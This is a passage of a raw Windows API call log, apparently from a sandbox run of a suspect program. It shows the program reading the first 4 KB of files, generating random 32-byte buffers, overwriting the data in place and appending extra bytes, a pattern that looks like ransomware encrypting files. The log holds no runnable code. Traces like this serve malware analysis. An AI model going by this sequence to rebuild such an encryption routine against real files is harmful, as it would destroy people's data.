1 [0082.407] SetFilePointerEx (in: hFile=0x8c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.407] GetProcessHeap () returned 0x4f10000 [0082.407] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0082.407] GetProcessHeap () returned 0x4f10000 [0082.407] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0082.408] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0082.408] GetProcessHeap () returned 0x4f10000 [0082.408] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0082.408] ReadFile (in: hFile=0x8c8, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0082.456] SetFilePointerEx (in: hFile=0x8c8, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.456] WriteFile (in: hFile=0x8c8, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0082.456] GetProcessHeap () returned 0x4f10000 [0082.456] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0082.456] GetProcessHeap () returned 0x4f10000 [0082.456] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.456] GetProcessHeap () returned 0x4f10000 [0082.456] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0082.456] GetProcessHeap () returned 0x4f10000 [0082.456] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.456] GetProcessHeap () returned 0x4f10000 [0082.456] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0082.456] GetProcessHeap () returned 0x4f10000 [0082.456] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.456] GetProcessHeap () returned 0x4f10000 [0082.456] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.456] GetProcessHeap () returned 0x4f10000 [0082.456] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.456] GetProcessHeap () returned 0x4f10000 [0082.456] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.456] GetProcessHeap () returned 0x4f10000 [0082.456] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.456] GetProcessHeap () returned 0x4f10000 [0082.456] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.456] GetProcessHeap () returned 0x4f10000 [0082.456] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.456] GetProcessHeap () returned 0x4f10000 [0082.456] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.456] GetProcessHeap () returned 0x4f10000 [0082.456] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.456] GetProcessHeap () returned 0x4f10000 [0082.457] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.457] GetProcessHeap () returned 0x4f10000 [0082.457] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.457] GetProcessHeap () returned 0x4f10000 [0082.457] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.457] GetProcessHeap () returned 0x4f10000 [0082.457] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.457] GetProcessHeap () returned 0x4f10000 [0082.457] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.457] GetProcessHeap () returned 0x4f10000 [0082.457] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.457] GetProcessHeap () returned 0x4f10000 [0082.457] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.457] GetProcessHeap () returned 0x4f10000 [0082.457] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.457] GetProcessHeap () returned 0x4f10000 [0082.457] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.457] GetProcessHeap () returned 0x4f10000 [0082.457] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.457] GetProcessHeap () returned 0x4f10000 [0082.457] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.457] GetProcessHeap () returned 0x4f10000 [0082.457] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.457] GetProcessHeap () returned 0x4f10000 [0082.457] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.457] GetProcessHeap () returned 0x4f10000 [0082.457] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.457] GetProcessHeap () returned 0x4f10000 [0082.457] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.457] GetProcessHeap () returned 0x4f10000 [0082.457] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.457] GetProcessHeap () returned 0x4f10000 [0082.457] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.457] GetProcessHeap () returned 0x4f10000 [0082.457] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.457] GetProcessHeap () returned 0x4f10000 [0082.457] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.457] GetProcessHeap () returned 0x4f10000 [0082.457] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.457] GetProcessHeap () returned 0x4f10000 [0082.458] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.458] GetProcessHeap () returned 0x4f10000 [0082.458] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.458] GetProcessHeap () returned 0x4f10000 [0082.458] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.458] GetProcessHeap () returned 0x4f10000 [0082.458] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.458] GetProcessHeap () returned 0x4f10000 [0082.458] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0082.458] GetProcessHeap () returned 0x4f10000 [0082.458] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.458] GetProcessHeap () returned 0x4f10000 [0082.458] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0082.458] GetProcessHeap () returned 0x4f10000 [0082.458] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0082.458] GetProcessHeap () returned 0x4f10000 [0082.458] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0082.458] GetProcessHeap () returned 0x4f10000 [0082.458] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0082.458] GetProcessHeap () returned 0x4f10000 [0082.458] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0082.458] GetProcessHeap () returned 0x4f10000 [0082.458] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0082.458] GetProcessHeap () returned 0x4f10000 [0082.458] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.458] GetProcessHeap () returned 0x4f10000 [0082.458] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0082.458] GetProcessHeap () returned 0x4f10000 [0082.458] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.458] GetProcessHeap () returned 0x4f10000 [0082.458] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.458] GetProcessHeap () returned 0x4f10000 [0082.458] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.458] GetProcessHeap () returned 0x4f10000 [0082.458] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.459] GetProcessHeap () returned 0x4f10000 [0082.459] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.459] GetProcessHeap () returned 0x4f10000 [0082.459] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.459] GetProcessHeap () returned 0x4f10000 [0082.459] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.459] GetProcessHeap () returned 0x4f10000 [0082.459] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.459] GetProcessHeap () returned 0x4f10000 [0082.459] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.459] GetProcessHeap () returned 0x4f10000 [0082.459] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.459] GetProcessHeap () returned 0x4f10000 [0082.459] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.459] GetProcessHeap () returned 0x4f10000 [0082.459] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.459] GetProcessHeap () returned 0x4f10000 [0082.459] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.459] GetProcessHeap () returned 0x4f10000 [0082.459] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.459] GetProcessHeap () returned 0x4f10000 [0082.459] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.459] GetProcessHeap () returned 0x4f10000 [0082.459] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.459] GetProcessHeap () returned 0x4f10000 [0082.459] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.459] GetProcessHeap () returned 0x4f10000 [0082.459] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.459] GetProcessHeap () returned 0x4f10000 [0082.460] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.460] GetProcessHeap () returned 0x4f10000 [0082.460] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.460] GetProcessHeap () returned 0x4f10000 [0082.460] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.460] GetProcessHeap () returned 0x4f10000 [0082.460] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.460] GetProcessHeap () returned 0x4f10000 [0082.460] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.460] GetProcessHeap () returned 0x4f10000 [0082.460] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.460] GetProcessHeap () returned 0x4f10000 [0082.460] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0082.460] GetProcessHeap () returned 0x4f10000 [0082.460] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.460] GetProcessHeap () returned 0x4f10000 [0082.460] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0082.460] GetProcessHeap () returned 0x4f10000 [0082.460] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0082.460] GetProcessHeap () returned 0x4f10000 [0082.460] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0082.460] GetProcessHeap () returned 0x4f10000 [0082.460] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0082.460] SetFilePointerEx (in: hFile=0x8c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.460] WriteFile (in: hFile=0x8c8, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0082.460] WriteFile (in: hFile=0x8c8, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0082.461] GetProcessHeap () returned 0x4f10000 [0082.461] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0082.461] GetProcessHeap () returned 0x4f10000 [0082.461] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0082.461] GetProcessHeap () returned 0x4f10000 [0082.461] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0082.461] CloseHandle (hObject=0x8c8) returned 1 [0082.461] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 83 [0082.462] SetFilePointerEx (in: hFile=0x8cc, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.462] ReadFile (in: hFile=0x8cc, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0082.462] SetFilePointerEx (in: hFile=0x8cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.462] GetProcessHeap () returned 0x4f10000 [0082.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0082.462] GetProcessHeap () returned 0x4f10000 [0082.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0082.462] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0082.462] GetProcessHeap () returned 0x4f10000 [0082.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0082.462] ReadFile (in: hFile=0x8cc, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0082.510] SetFilePointerEx (in: hFile=0x8cc, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.510] WriteFile (in: hFile=0x8cc, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0082.510] GetProcessHeap () returned 0x4f10000 [0082.510] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0082.510] GetProcessHeap () returned 0x4f10000 [0082.510] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.510] GetProcessHeap () returned 0x4f10000 [0082.510] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0082.510] GetProcessHeap () returned 0x4f10000 [0082.510] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.510] GetProcessHeap () returned 0x4f10000 [0082.510] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0082.510] GetProcessHeap () returned 0x4f10000 [0082.510] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.510] GetProcessHeap () returned 0x4f10000 [0082.510] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.510] GetProcessHeap () returned 0x4f10000 [0082.510] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.510] GetProcessHeap () returned 0x4f10000 [0082.510] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.510] GetProcessHeap () returned 0x4f10000 [0082.510] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.510] GetProcessHeap () returned 0x4f10000 [0082.511] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.511] GetProcessHeap () returned 0x4f10000 [0082.511] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.511] GetProcessHeap () returned 0x4f10000 [0082.511] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.511] GetProcessHeap () returned 0x4f10000 [0082.511] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.511] GetProcessHeap () returned 0x4f10000 [0082.511] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.511] GetProcessHeap () returned 0x4f10000 [0082.511] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.511] GetProcessHeap () returned 0x4f10000 [0082.511] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.511] GetProcessHeap () returned 0x4f10000 [0082.511] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.511] GetProcessHeap () returned 0x4f10000 [0082.511] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.511] GetProcessHeap () returned 0x4f10000 [0082.511] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.511] GetProcessHeap () returned 0x4f10000 [0082.511] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.511] GetProcessHeap () returned 0x4f10000 [0082.511] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.511] GetProcessHeap () returned 0x4f10000 [0082.511] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.511] GetProcessHeap () returned 0x4f10000 [0082.511] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.511] GetProcessHeap () returned 0x4f10000 [0082.511] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.511] GetProcessHeap () returned 0x4f10000 [0082.511] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.511] GetProcessHeap () returned 0x4f10000 [0082.511] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.511] GetProcessHeap () returned 0x4f10000 [0082.511] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.511] GetProcessHeap () returned 0x4f10000 [0082.511] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.511] GetProcessHeap () returned 0x4f10000 [0082.511] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.512] GetProcessHeap () returned 0x4f10000 [0082.512] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.512] GetProcessHeap () returned 0x4f10000 [0082.512] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.512] GetProcessHeap () returned 0x4f10000 [0082.512] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.512] GetProcessHeap () returned 0x4f10000 [0082.512] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.512] GetProcessHeap () returned 0x4f10000 [0082.512] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.512] GetProcessHeap () returned 0x4f10000 [0082.512] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.512] GetProcessHeap () returned 0x4f10000 [0082.512] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.512] GetProcessHeap () returned 0x4f10000 [0082.512] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.512] GetProcessHeap () returned 0x4f10000 [0082.512] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0082.512] GetProcessHeap () returned 0x4f10000 [0082.512] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.512] GetProcessHeap () returned 0x4f10000 [0082.512] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0082.512] GetProcessHeap () returned 0x4f10000 [0082.512] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0082.512] GetProcessHeap () returned 0x4f10000 [0082.512] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0082.512] GetProcessHeap () returned 0x4f10000 [0082.512] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0082.512] GetProcessHeap () returned 0x4f10000 [0082.512] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0082.512] GetProcessHeap () returned 0x4f10000 [0082.512] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0082.512] GetProcessHeap () returned 0x4f10000 [0082.512] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.512] GetProcessHeap () returned 0x4f10000 [0082.512] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0082.512] GetProcessHeap () returned 0x4f10000 [0082.512] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.513] GetProcessHeap () returned 0x4f10000 [0082.513] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.513] GetProcessHeap () returned 0x4f10000 [0082.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.513] GetProcessHeap () returned 0x4f10000 [0082.513] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.513] GetProcessHeap () returned 0x4f10000 [0082.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.513] GetProcessHeap () returned 0x4f10000 [0082.513] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.513] GetProcessHeap () returned 0x4f10000 [0082.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.513] GetProcessHeap () returned 0x4f10000 [0082.513] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.513] GetProcessHeap () returned 0x4f10000 [0082.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.513] GetProcessHeap () returned 0x4f10000 [0082.513] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.513] GetProcessHeap () returned 0x4f10000 [0082.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.513] GetProcessHeap () returned 0x4f10000 [0082.513] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.513] GetProcessHeap () returned 0x4f10000 [0082.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.513] GetProcessHeap () returned 0x4f10000 [0082.513] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.513] GetProcessHeap () returned 0x4f10000 [0082.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.514] GetProcessHeap () returned 0x4f10000 [0082.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, 